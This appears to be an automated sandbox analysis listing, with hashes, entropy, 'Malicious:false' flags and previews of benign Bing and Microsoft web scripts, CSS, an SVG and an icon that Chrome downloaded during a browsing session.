                                                                            Preview:.ftrH,.ftrHd,.ftrD>a,.ftrD>div{white-space:nowrap;height:36px;line-height:36px;padding:0 16px}.ftrD{max-height:216px;overflow:hidden;min-width:125px}.amazonBackground{background:#f2f2f2 !important}.ftrD>a,.ftrD>div{display:block}.ftrS .ftrD{margin-right:10px}.ftrSbR{position:absolute;top:0;right:0;height:100%;margin:5px 0;padding-right:3px}.ftrB .sw_ddbk{margin:2px 0 2px 7px}.ftrB .sw_tpcg,.ftrB .sw_tpcbl{margin:0 0 0 14px}.ftrH,.ftrHd,.ftrB .sw_ddbk,.ftrB .sw_tpcg,.ftrB .sw_tpcbl{display:inline-block;zoom:1}#b_tween a.ftrH{height:30px;line-height:30px;background-color:transparent;border:none;border-radius:16px;max-width:220px;padding:0 15px}#b_tween .ftrB.b_time_filter_bold a.ftrH{font-weight:bold}#b_tween .ftrB a.ftrH.b_selected,#b_tween .ftrB a.ftrH:hover,#b_tween .ftrB a.ftrH:focus{color:#111;cursor:pointer;background-color:#fff}@media screen and (forced-colors:active){#b_tween a.ftrH,div.b_dropdown .ftrD a{color:WindowText}}#b_tween .ftrB .b_dropdown{position:absolute;background-c
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (412), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):412
                                                                            Entropy (8bit):5.17305928357574
                                                                            Encrypted:false
                                                                            SSDEEP:12:2QBdoySw+YEXj3Gs07fZVD7H82MgNukm7UqgU:2Qb7+YEXz4fZxHjmoRU
                                                                            MD5:581C2C396720F651CC2F3D40E9E727F8
                                                                            SHA1:6515C6C20730DCF81A861EA8D16682AAC4DDA273
                                                                            SHA-256:D6787BD009EA758F8ABDD437032799F7004247FC10F631B93AF0FA84607597EC
                                                                            SHA-512:E7198C04B0E8CEE80B8278E77FA0C301915B32F62C0DB36C1D7D2D9E20A7ACD578308070EB833ED8450A2360358E118E55B47DB149FB4AB8053E8FAA2C925568
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(){var i,t,r;if(n&&Lib.CssClass.contains(n,"b_active"))try{i=_ge("b_header");i.scrollIntoView({behavior:"smooth"});t=_ge("sb_form_q");t.focus();t.click();r=t.value;t.setSelectionRange(0,r.length)}catch(u){_w.sj_log&&sj_log("CI.WebScope","error",u.message)}},!0)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):219
                                                                            Entropy (8bit):5.119404786158862
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXh6BodmYWyXPBsw+SFsjRntLsMIxwCDrlT:2QBdoySw+YEOM8nlT
                                                                            MD5:33C123623267DDCCC3506DE4E71C105B
                                                                            SHA1:61C759ACDD259A7520988C3D0D58BB4C5A25D87E
                                                                            SHA-256:DDA145AF1F9D026E6C080B2D21FE7CA1CD46F4FB58DC1CAE1474C119B1E1FF2C
                                                                            SHA-512:0D0B40C625997D91D216DF9489D8D048047FC5179C264EEB77B8B1D28E5E11DFD633BE4B3AF07AFD96F9E0F526E5DD1BA97232AA6DE1B05A94FC60682321D151
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(t){n&&Lib.CssClass.contains(n,"b_active")&&(sj_pd(t),sj_sp(t))},!0)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (576), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):576
                                                                            Entropy (8bit):5.192163014367754
                                                                            Encrypted:false
                                                                            SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                            MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                            SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                            SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                            SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):34732
                                                                            Entropy (8bit):5.452487645923916
                                                                            Encrypted:false
                                                                            SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                            MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                            SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                            SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                            SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65398)
                                                                            Category:downloaded
                                                                            Size (bytes):157941
                                                                            Entropy (8bit):5.427525512913149
                                                                            Encrypted:false
                                                                            SSDEEP:3072:3a1X95TgJ4EByVFyt2VYX3p+mxOBqT3D/xXc:3uDs4EBys8WDTT/xXc
                                                                            MD5:EB9A4F7F7F5D2530C19F550119593B3B
                                                                            SHA1:21C9DFFA6C33B1C3B1AA61E949DA5CDCB2698D58
                                                                            SHA-256:4D5D28CB98E14CC549CCB63DBF2D60D40D6A41E5B594984EB4C6CAE4FF07A265
                                                                            SHA-512:1145CE8154CBDBFEA1FCF9E6851D48E7E9BF066B7321CA5ECB6E30B44904A18D8B4835E40791A67FF90000FE9E40CEC87055C0CC67FA3A04177CBF17B86713A5
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-4.min.js
                                                                            Preview:/*!. * 1DS JS SDK Analytics Web, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t="undefined";if("object"==typeof exports&&typeof module!=t)n(exports);else if("function"==typeof define&&define.amd)define(["exports"],n);else{var r,i,e=typeof globalThis!=t?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_analytics_web_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},g=e.v=e.v||[],l=d[o]=d[o]||{},p=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),n(a),a)r="x",f[i]=a[i],g[i]=s,typeof d[i]==t?(r="n",(d[i]=a[i])&&(p[i]=s)):p[i]||(p[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(t){"use strict";var u="object",se="undefined",s="prototype",l=Object,f=l[s];function d(e,n){return e||n}var g,ie=undefined,m=null,v="",T="function",b="object",I="prototype",C="__proto__",E="undefined",N="constructor",S="Symbol",P="_polyfill",w="length",A="name",Y="call",D="toString",O=d(Object),_
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2973), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2973
                                                                            Entropy (8bit):5.352495844975926
                                                                            Encrypted:false
                                                                            SSDEEP:48:Yc/UH6JCZ1n9Hc67HCBIjq7uziBuJG+yiOUJMU8bnWzknw0ow5WO7wxRIjCRxGHG:pw6CD9HccCgLmQG+FzJe4Jc5WvxRmCRH
                                                                            MD5:FED73198B7A6F66CB0437285861ABF2C
                                                                            SHA1:F99EDB64121B7AD72ED2BF32CE3C43119E065214
                                                                            SHA-256:ED46B58E057A54BFE3C3250487B4F885B0AE22EABB93E10CC45C13E3B97F32F2
                                                                            SHA-512:32C388C5BD1E960288BEB06336F26B72C24731776D5CB02B5230037E2655C610F9F59E42566E8345571078EC6F5E00CD9DBDA8E0C5B5F78FD3157AB0E4C9FC77
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rs/6r/uR/jnc,nj/Qp5q6DtDal0Q6zp3EOeEQbFTsW0.js?or=w"
                                                                            Preview:(function(n,t,i,r,u,f,e,o){if(typeof RMS_IACL=="undefined"){_w.RMS_IACL={};var s,h,c="data-src",w="data-dpr",l="getAttribute",g=/^(\/th\?(?:id\=|.*&id\=))([^&]*)(.*)$/i,nt=/(&|\?)bw=/i,tt=".svg",a=3,y=20;function b(t){var r,i;t&&(r=t[l](c),r&&(t.removeAttribute(c),i=n("img"),i.onload=function(n){h--;i.onload=null;var r=t.parentNode;r&&(p(t,i),t.parentNode.replaceChild(i,t));v(n,i,r,null)},i.onerror=function(n){h--;v(n,i,!1,t)},i.src=r))}function it(t,i,r,u){for(var f,y,o=[],e=t[i],s=i;s<r;s++)o.push(t[s].tid);f=n("img");f.onload=function(n){var y,o,b,c,k;h-=r-i;f.onload=null;p(e,f);var it=e[l]("data-width"),g=e[l](w),u=g?parseFloat(g):1;for(y=i;y<r;y++){o=t[y];b=o.style;b.position="relative";b.overflow="hidden";b.direction="ltr";p(o,o);c=f.cloneNode();k="";o.hasAttribute("title")?(k=o.attributes.title.value,c.setAttribute("title",o.attributes.title.value)):o.hasAttribute("alt")&&(k=o.attributes.alt.value);c.setAttribute("alt",k);c.removeAttribute("width");c.removeAttribute("height");va
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (622), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):622
                                                                            Entropy (8bit):5.265947581512117
                                                                            Encrypted:false
                                                                            SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                            MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                            SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                            SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                            SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/uhCnIv_xh3wzed7ntfAo1Gf_1s8.js
                                                                            Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):226
                                                                            Entropy (8bit):4.923112772413901
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                            MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                            SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                            SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                            SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):52717
                                                                            Entropy (8bit):5.462668685745912
                                                                            Encrypted:false
                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://consentdeliveryfd.azurefd.net/mscc/lib/v2/wcp-consent.js
                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3363
                                                                            Entropy (8bit):5.195022922251816
                                                                            Encrypted:false
                                                                            SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                            MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                            SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                            SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                            SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (836), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):836
                                                                            Entropy (8bit):4.858167659931382
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q+eYdiYodiondjOpBYyMmkIzJNMAbm79PkXTpB8eMUm7QDmkXaWhBxldM:2Q+eY/AM7vu78mZMDr/M
                                                                            MD5:02DBE1B08948A345311FDF0393604FE3
                                                                            SHA1:A1C1D3EC09E80B3480DF001F4CFB351AFD09DD45
                                                                            SHA-256:F80560FBF1EA024970226F3995C031CEA0116A6741593AF394AD9CD55499F12C
                                                                            SHA-512:FD911C725EF9C51BDB579B922BDCCAA60765C431C7695978D1F35FF6181D0672DE32FF0C33805313FA90AF326BCEE517D865131621670BE6E5EF6BE0B87ADD62
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/ocHT7AnoCzSA3wAfTPs1Gv0J3UU.js
                                                                            Preview:(function(){var r=!1,n=_ge("scope_tools_wrapper"),t=_ge("b_tween_searchResults"),u=_ge("b_tween_searchTools"),i=_ge("b_tween"),e=_ge("b_topw"),f=!1;n&&u&&i&&(f=Lib.CssClass.contains(i,"b_hidetoggletween"),Lib.CssClass.contains(u,"b_hide")||(Lib.CssClass.add(n,"active"),r=!0),Lib.CssClass.remove(n,"b_hide"),sj_be(n,"click",function(){r?(!t&&e&&Lib.CssClass.add(i,"b_hidetoggletween"),_w.sj_log&&sj_log("CI.tweenToggle","hideTools","1"),Lib.CssClass.remove(n,"active"),Lib.CssClass.add(u,"b_hide"),t&&Lib.CssClass.remove(t,"b_hide"),f&&Lib.CssClass.add(i,"b_hidetoggletween"),r=!1):(!t&&e&&Lib.CssClass.remove(i,"b_hidetoggletween"),_w.sj_log&&sj_log("CI.tweenToggle","showTools","1"),Lib.CssClass.add(n,"active"),Lib.CssClass.remove(u,"b_hide"),t&&Lib.CssClass.add(t,"b_hide"),f&&Lib.CssClass.remove(i,"b_hidetoggletween"),r=!0)}))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1508), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1508
                                                                            Entropy (8bit):5.225246371387329
                                                                            Encrypted:false
                                                                            SSDEEP:24:rVnoyfEzPoXeqz23l2T6hBTfBH50t0LqrNn4IjMgnVXaFgf4PdIrryv6p53PQtE7:rVnoyJen3YT+BzBHmiLYNn5XMgf8jv6t
                                                                            MD5:60E4AA30EF7EEAF5FAABB4D13BBD7F0A
                                                                            SHA1:4F861C616B0D90C28CE0E8495A453F73F4D0F2BB
                                                                            SHA-256:796EB10FDEACBEC23196544F9F66B423262923EF7B6F79977E9A157DB3D24AAC
                                                                            SHA-512:11BF27E4426BF5B7D97CEDDE31D1E775B5158A1E950006718EBACF0E1E874FB3284C79ECC59D4C2B7EED2E35C54695B4197A855834D0331F8FEFBD603DD8E480
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/T4YcYWsNkMKM4OhJWkU_c_TQ8rs.js
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},SHwlochelper;(function(n){function e(n,t,i,u,f){r(n.coords.latitude,n.coords.longitude,n.coords.accuracy,t,i,u,f)}function r(t,r,u,e,o,s,h){var c=n.sF(f,t,r,u);c+="&sid="+e;i(c,n.logEventTypeDev,"DeviceLocation",o,s,h)}function o(t,r,f,e){var o=u+"&sid="+t;i(o,n.logEventTypeDev,"Block",r,f,e)}function i(n,i,r,u,f,e){n+="&clientsid="+_G.SID;var o=sj_gx();o.open("GET",n,!0);t(i,u,"try"+r);o.onreadystatechange=function(){var n,s;o.readyState===4&&(o.status===200?(o.responseText&&(s=(n=_ge("PromptDetails"))!==null&&n!==void 0?n:_d.body,s&&(sj_appHTML(s,o.responseText),_w.rms&&_w.rms.start())),t(i,u,r+"Success"),typeof f=="function"&&f()):(t(i,u,r+"Failure"),typeof e=="function"&&e()))};o.send()}function t(n,t,i){for(var u=[],r=3;r<arguments.length;r++)u[r-3]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):43
                                                                            Entropy (8bit):4.189956395196745
                                                                            Encrypted:false
                                                                            SSDEEP:3:JWlKSADcg:JWM5R
                                                                            MD5:9B014A61085EA79FDBA9A98CD3E60738
                                                                            SHA1:31867DFFB3EE983499770A4CEFE739BFCCF927C6
                                                                            SHA-256:9447459112F21BDACC71209C99E2A88D978C9A0B22802CA05B74C18823C725CC
                                                                            SHA-512:BD8B8F75D86A6C1FD269DFE598CDB194C643E3E1DA99794A613E812EF0A69E000DD19DD68579264059626C7128A78E483EF2448F0B4DA85C642B25C719BBA721
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/MYZ9_7PumDSZdwpM7-c5v8z5J8Y.css
                                                                            Preview:#b_header #id_h{content-visibility:visible}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                            Category:dropped
                                                                            Size (bytes):4286
                                                                            Entropy (8bit):1.4428178104858655
                                                                            Encrypted:false
                                                                            SSDEEP:6:sfyl+rblmboWbol4bolnbsoItwqol0roooooosEol07ooooooooooolxo/lmyosh:suE9gwXZBQ4Nxbk7/GrQV/z1nfx
                                                                            MD5:30967B1B52CB6DF18A8AF8FCC04F83C9
                                                                            SHA1:AAF67CD84FCD64FB2D8974D7135D6F1E4FC03588
                                                                            SHA-256:439B6089E45EF1E0C37EF88764D5C99A3B2752609C4E2AF3376480D7FFCFAF2E
                                                                            SHA-512:7CB3C09A81FBD301741E7CF5296C406BAF1C76685D354C54457C87F6471867390A1AEED9F95701EB9361D7DFACCE31AFD1D240841037FC1DE4A120C66C1B088C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...... .... .........(... ...@..... .........%...%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n...n...n....................................................................
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):97766
                                                                            Entropy (8bit):5.308376488066434
                                                                            Encrypted:false
                                                                            SSDEEP:1536:UnOd+PnDvGR3mVwfgWffe/Hz+XCDX8xKXu7gTRsR9CIDsWrJAMizLidk5bye31f6:h+PnDvGR3mVygWffe/HzOCDX8xKXu7gc
                                                                            MD5:6AF3EC90B754488A743EC93E9E25EA6F
                                                                            SHA1:B6906064D5DF3F3564B8E75FDB5D4A7F3B7B1A7F
                                                                            SHA-256:59D101B7334F4231DFC2A6C27DE326C42E3891255F3A141485A72D9DD223ABAC
                                                                            SHA-512:1DE739C726A57A11D28CD075730E21369D04BAB37B4D3052A3BD2AC66A511A2597ED8031431A4141F6D353DBC3B3DEFA0EC6D0344887D1541489EE5589FD8EFD
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/js/bundle/bundle.thread-view.1.0.4.354.min.js
                                                                            Preview:function isElementVisisbleInViewport(n){typeof jQuery=="function"&&n instanceof jQuery&&(n=n[0]);var i=!1,t=$("#Footer");return t.length>0&&t.offset()&&(i=$(document).scrollTop()+$(window).height()>t.offset().top),i}function onFooterVisibleInViewPort(){var n=$("#PageFooter");return function(){var t=isElementVisisbleInViewport(n);t?(n.removeClass("footeroutside"),n.addClass("footerinside")):(n.addClass("footeroutside"),n.removeClass("footerinside"))}}var Answers,answersResDefined,answersUtilDefined;String.prototype.startsWith||(String.prototype.startsWith=function(n,t){return this.substr(!t||t<0?0:+t,n.length)===n}),function(n){n.fn.GetTextRemainsElement=function(){var r=n(this),i=null,t=r.attr("id");return t!=undefined&&t!=null&&t.length>0&&(i=n("#"+t+"_remains")),i};n.fn.SetTextRemainContent=function(){var u=n(this),f=parseInt(u.attr("maxlength"),10),i=u.val(),r=i.length,s;r>f&&(i=n.trim(i),r=i.length,r>f&&(i=i.substring(0,f),u.val(i),r=f));var t=u.GetTextRemainsElement(),e=t.attr("fo
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:dropped
                                                                            Size (bytes):242
                                                                            Entropy (8bit):5.203361030947984
                                                                            Encrypted:false
                                                                            SSDEEP:6:tvKIiad4mc4sl3MNWgZPqt4BGxngLEDurdGo6K/:tvG1MNWcPqtMZF/
                                                                            MD5:5F1896B9BA3B5BBFF5167A84A8BF30CA
                                                                            SHA1:93585E6A22D05B27A7B157957F10F7CC1FE2E6CC
                                                                            SHA-256:41AB929756123C1EC0A9F778FC98429DE6ED7B33B0DDA0876816C6C21A8C91F8
                                                                            SHA-512:749180794DBED2E9C45F156693F6948B9D63B2857F0278B6BE17A481DB33BDDF88CA3EE7A04512D518EF5C8F7EC5082737B5463F908FE7024F95E044F066FEC4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 16.97"><title>threaded-reply</title><path d="M0,1.65H1.65V9.84H16.87l-6-6,1.16-1.15,8,8-8,8L10.9,17.46l6-6H0Z" transform="translate(-0.01 -1.65)"/></svg>
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (21932)
                                                                            Category:dropped
                                                                            Size (bytes):21963
                                                                            Entropy (8bit):5.358200717387569
                                                                            Encrypted:false
                                                                            SSDEEP:384:Km4kT1lYxfqyDOhKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzueAi:35Tifh3bBpBnqIH+Z6sepXv0uQaV
                                                                            MD5:974B999F9F10DCF784EE257E2AA2F953
                                                                            SHA1:EAEF03A5BA6C5C15B373AB5916168CDE71A29572
                                                                            SHA-256:5A0F2478D335D70CD2510F8EF00BFC0CA2057B787302771EBD411970F1C0ED44
                                                                            SHA-512:CAACB5F8DC1CA7210B151E75DD5054650F70C63C49C6D27A77FF851B24279FDBF7FDF35174EA44F0A0104C909BE3000A40CD5DF45CE5F4163537997969737852
                                                                            Malicious:false
                                                                            Reputation:low
